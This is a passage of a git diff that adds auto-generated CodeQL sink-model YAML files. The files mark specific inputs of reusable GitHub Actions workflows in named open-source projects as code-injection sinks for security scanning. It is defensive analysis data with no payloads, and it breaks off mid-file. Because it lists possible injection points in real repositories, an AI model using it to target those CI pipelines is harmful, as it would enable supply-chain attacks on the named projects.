diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 000000000000..448d48f661db --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 000000000000..50eb3b1af36a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 000000000000..780fa92d20cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..275d46772a2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 000000000000..271c80c575e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 000000000000..0f4ad0a7ca70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 000000000000..c38ae9258600 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 000000000000..fd4697ac1c43 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 000000000000..90c4c20b5857 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 000000000000..51d99171a541 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 000000000000..8e74c9b811d4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 000000000000..cd7de6d57866 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..ecea4012c75c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..f8ee5402a92f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 000000000000..aa76014db324 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 000000000000..e52ce3c8318f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 000000000000..31f24a27268a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 000000000000..4ace66c79c31 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 000000000000..44518d6a348f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 000000000000..c0edbfae484c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 000000000000..a28ffce30f73 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 000000000000..afe2daa172ee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 000000000000..a07044c0ccc3 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 000000000000..250307e3acdb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 000000000000..e968f2097065 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml 
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
new file mode 100644
index 000000000000..438f637a9a09
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
new file mode 100644
index 000000000000..7e7b82b25f52
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"]
+ - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
new file mode 100644
index 000000000000..e3c3b19e4413
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
new file mode 100644
index 000000000000..704adb3f121b
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
new file mode 100644
index 000000000000..5300a7d145e1
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
new file mode 100644
index 000000000000..f82254bd22b6
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"]
+ - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
new file mode 100644
index 000000000000..80a26a9e65fb
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
new file mode 100644
index 000000000000..eb5e7835565f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
new file mode 100644
index 000000000000..cd2629f49bcf
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
new file mode 100644
index 000000000000..77ad5d6a6d35
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"]
+ - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
new file mode 100644
index 000000000000..a881a1a5fd3e
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
new file mode 100644
index 000000000000..693d3abc03e1
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
new file mode 100644
index 000000000000..119cbe465e6a
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"]
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"]
+ - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
new file mode 100644
index 000000000000..2d35b933923f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"]
+ - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
new file mode 100644
index 000000000000..7ca34fc3e44d
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"]
+ - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
new file mode 100644
index 000000000000..d3cc8e73b708
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "inputs.constraints", "code-injection", "generated"]
+ - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "inputs.constraints", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
new file mode 100644
index 000000000000..a9f8401aab2d
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
